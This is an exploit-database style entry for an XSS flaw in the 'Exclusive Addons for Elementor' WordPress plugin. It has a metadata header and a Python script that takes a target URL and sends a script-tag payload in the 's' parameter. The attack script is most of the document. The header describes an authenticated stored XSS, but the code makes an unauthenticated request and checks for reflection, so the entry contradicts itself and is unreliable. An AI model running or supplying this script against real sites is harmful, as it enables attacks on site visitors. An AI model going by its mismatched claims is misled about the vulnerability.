# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)
# Original Author: Wordfence Security Team
# Exploit Author: Al Baradi Joy
# Exploit Date: March 13, 2024
# Vendor Homepage: https://exclusiveaddons.com/
# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
# Version: Up to and including 2.6.9
# Tested Versions: 2.6.9
# CVE ID: CVE-2024-1234
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
# Description:
The Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to
and including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via
the 's' parameter. Due to improper input sanitization and output escaping,
an attacker with contributor-level permissions or higher can inject
arbitrary JavaScript that executes when a user views the affected page.
# Proof of Concept: Yes
# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin
# CVSS Score: 6.5 (Medium)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
# Notes:
To exploit this vulnerability, an attacker needs an authenticated user role
with permission to edit posts. Injecting malicious JavaScript can lead to
session hijacking, redirections, and other client-side attacks.

## Exploit Code:

```python
import requests
from urllib.parse import urlparse

# Banner
def display_banner():
    exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin
Stored XSS"
    print("="*50)
    print(f"Exploit Title: {exploit_title}")
    print("Made By Al Baradi Joy")
    print("="*50)

# Function to validate URL
def validate_url(url):
    # Check if the URL is valid and well-formed
    parsed_url = urlparse(url)
    if not parsed_url.scheme in ["http", "https"]:
        print("Error: Invalid URL. Please ensure the URL starts with http://
or https://")
        return False
    return True

# Function to exploit XSS vulnerability
def exploit_xss(target_url):
    # The XSS payload to inject
    payload = "<script>alert('XSS Exploit')</script>"

    # The parameters to be passed (in this case, we are exploiting the 's'
parameter)
    params = {
        's': payload
    }

    # Send a GET request to the vulnerable URL with the payload
    try:
        print(f"Sending exploit to: {target_url}")
        response = requests.get(target_url, params=params, timeout=10)

        # Check if the status code is OK and if the payload is reflected in
the response
        if response.status_code == 200 and payload in response.text:
            print(f"XSS exploit successful! Payload: {payload}")
        elif response.status_code != 200:
            print(f"Error: Received non-OK status code
{response.status_code}")
        else:
            print("Exploit failed or no XSS reflected.")
    except requests.exceptions.RequestException as e:
        print(f"Error: Request failed - {e}")
    except Exception as e:
        print(f"Unexpected error: {e}")

if __name__ == "__main__":
    # Display banner
    display_banner()

    # Ask the user for the target URL
    target_url = input("Enter the target URL: ").strip()

    # Validate the provided URL
    if validate_url(target_url):
        # Call the exploit function if URL is valid
        exploit_xss(target_url)